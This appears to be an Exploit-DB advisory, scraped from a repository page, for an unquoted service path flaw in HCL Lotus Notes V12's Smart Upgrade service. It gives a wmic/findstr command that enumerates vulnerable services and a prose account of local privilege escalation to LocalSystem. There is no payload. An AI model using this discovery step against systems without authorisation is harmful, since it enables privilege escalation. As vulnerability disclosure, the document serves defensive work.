0990eb4d38
8 changes to exploits/shellcodes HCL Lotus Notes V12 - Unquoted Service Path Auerswald COMfortel 2.8F - Authentication Bypass Auerswald COMpact 8.0B - Privilege Escalation Auerswald COMpact 8.0B - Arbitrary File Disclosure Auerswald COMpact 8.0B - Multiple Backdoors Advanced Comment System 1.0 - Remote Command Execution (RCE) Croogo 3.0.2 - Remote Code Execution (Authenticated)
28 lines
No EOL
923 B
Text
28 lines
No EOL
923 B
Text
# Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
|
|
# Exploit Author: Mert DAŞ
|
|
# Version: V12
|
|
# Date: 01/12/2021
|
|
# Vendor Homepage: https://www.hcltechsw.com/domino/download
|
|
# Tested on: Windows 10
|
|
|
|
|
|
ProcessId : 3860
|
|
Name : LNSUSvc
|
|
DisplayName : HCL Notes Smart Upgrade Hizmeti
|
|
PathName : c:\HCL\Notes\SUService.exe
|
|
StartName : LocalSystem
|
|
StartMode : Auto
|
|
State : Running
|
|
|
|
Discovery
|
|
-------------------------
|
|
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
|
|
|
|
#Exploit:
|
|
|
|
A successful attempt would require the local user to be able to insert
|
|
their code in the system root path undetected by the OS or other security
|
|
applications where it could potentially be executed during application
|
|
startup or reboot. If successful, the local user's code would execute with
|
|
the elevated privileges of the application. |